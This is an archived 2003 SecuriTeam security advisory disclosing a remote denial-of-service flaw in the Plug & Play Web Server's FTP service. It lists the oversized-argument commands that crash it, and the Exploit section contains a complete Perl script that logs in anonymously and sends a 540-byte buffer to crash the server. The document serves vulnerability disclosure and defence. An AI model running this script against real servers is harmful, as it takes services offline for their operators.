[NT] Denial of Service in Plug and Play's FTP Server

From: SecuriTeam (support_at_securiteam.com)
Date: 09/21/03

  • Next message: SecuriTeam: "[REVS] PHRACK #62 Has Been Released" 
    To: list@securiteam.com
Date: 21 Sep 2003 13:14:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Denial of Service in Plug and Play's FTP Server
    ------------------------------------------------------------------------

    SUMMARY

    The <http://www.pandpsoftware.com> Plug and Play Web Server "provides all
    of the tools you need to host your own website. The tools are bundled
    together in one comprehensive software package that it is incredibly easy
    to use and maintain". Multiple vulnerabilities have been found in the
    product's FTP server allowing remote attackers to cause the service to
    crash.

    DETAILS

    Vulnerable systems:
     * Plug & Play Web Server version 1.0002c

    A vulnerability has been identified in Plug & Play Web (FTP) server, which
    allows malicious users to remotely crash the server. By connecting to the
    server and issuing a command (dir, ls, delete, mkdir, DELE, RMD, MKD)
    followed by large amounts of data, the server crashes.

    dir [Ax509]
    ls [Ax509]
    delete [Ax509]
    mkdir [Ax509]
    DELE [Ax509]
    RMD [Ax509]
    MKD [Ax509]

    Vendor status:
    The vendor has been informed, and they are fixing this bug. The updated
    version, when released, can be downloaded from:
    <http://www.pandpsoftware.com/download.htm>
    http://www.pandpsoftware.com/download.htm.

    Exploit:
    #!/usr/bin/perl
    # ppftpdos.pl - Remote denial of service against Plug & Play FTP server

    use Net::FTP;

    $host = $ARGV[0];

    $buffer = "A"x540;

    if("$ARGV[0]" eq "") {
            print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n");
            print("b_naamneh@hotmail.com - http://www.bsecurity.tk\n");
            print("====================================================\n");
            die("Usage : ./PPftpdos <host\/ip>\n");
    } else {

            print("Connecting to $host...\n");
            my $ftp = Net::FTP->new($host) or die "Couldn't connect to
    $host\n";
            print("Connected!\n");

            $username = "anonymous";
            $password = "anonymous";

            $ftp->login($username, $password)
            or die "Could not log in.\n";

            $ftp->dir($buffer);

            $ftp->quit();

            print("Success!\n");
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:b_naamneh@hotmail.com> Bahaa
    Naamneh.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] PHRACK #62 Has Been Released"

    Relevant Pages